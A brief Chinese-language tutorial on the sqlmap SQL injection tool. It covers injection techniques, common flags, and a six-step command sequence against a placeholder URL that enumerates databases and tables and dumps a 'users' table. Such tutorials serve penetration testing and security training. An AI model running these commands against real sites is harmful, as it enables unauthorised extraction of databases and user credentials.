sqlmap是一个自动化的sql注入工具,主要功能扫描、发现并利用给定的url的sql注入漏洞,内置了很多插件sqlmap支持的数据库: MySQL、oracle、sql-server、DB2.... 注意:sqlmap只用来检测和sql注入,不能扫描网站的漏洞
sqlmap使用的sql注入方式:
1、基于布尔类型盲注:可以根据页面的返回判断条件真假的注入
2、基于时间的盲注;根据页面返回内容判断,延迟时间是否执行
3、基于报错注入:根据页面返回的错误信息
4、联合查询注入:根据使用的union的情况下注入
sqlmap常用参数:
-u url: 检测的注入点
--dbs: 列出所有数据库的名称
--current-db: 列出当前的数据库名称
-D: 指定的一个数据库
--tables: 列出数据库表名称
-T: 指定的一个表名称
--columns: 列出所有的字段名
-C: 指定字段
--dump: 列出字段的内容
--users: 获取数据所有的用户信息
步骤:
1、检测「注入点」
sqlmap -u 'http://xx/?id=1'
2、查看所有「数据库」
sqlmap -u 'http://xx/?id=1' --dbs
3、查看当前使用的数据库
sqlmap -u 'http://xx/?id=1' --current-db
4、查看「数据表」
sqlmap -u 'http://xx/?id=1' -D 'security' --tables
5、查看「字段」
sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --columns
6、查看「数据」
sqlmap -u 'http://xx/?id=1' -D 'security' -T 'users' --dump
